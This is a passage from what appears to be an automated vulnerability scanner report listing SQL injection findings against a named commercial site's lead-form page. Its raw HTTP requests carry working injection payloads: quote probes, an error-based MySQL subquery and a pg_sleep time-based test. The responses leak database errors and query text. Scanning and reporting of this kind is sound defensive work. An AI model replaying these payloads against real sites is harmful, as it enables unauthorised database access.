P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '000 - 24,999&attributeId_431=2801__A business that I am about to start&attribute' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan''&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.28. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_430 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_430 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_430 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999'&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'business that I am about to start&attributeId_432[]=2806__Business expansion&att' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999''&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.29. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_430 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_430 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_430 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999'&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'business that I am about to start&attributeId_432[]=2806__Business expansion&att' at line 5

1.30. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_431 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_431 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_431 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start'&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2806__Business expansion&attributeId_433=2815__0-6 months (Start-up)&attribut' at line 5

1.31. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_431 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_431 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_431 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start'&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2806__Business expansion&attributeId_433=2815__0-6 months (Start-up)&attribut' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start''&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:42:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.32. http://www.insideup.com/ppc/leadflow/bulo00/project.php [attributeId_432%5B%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The attributeId_432%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_432%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion'&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:22:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


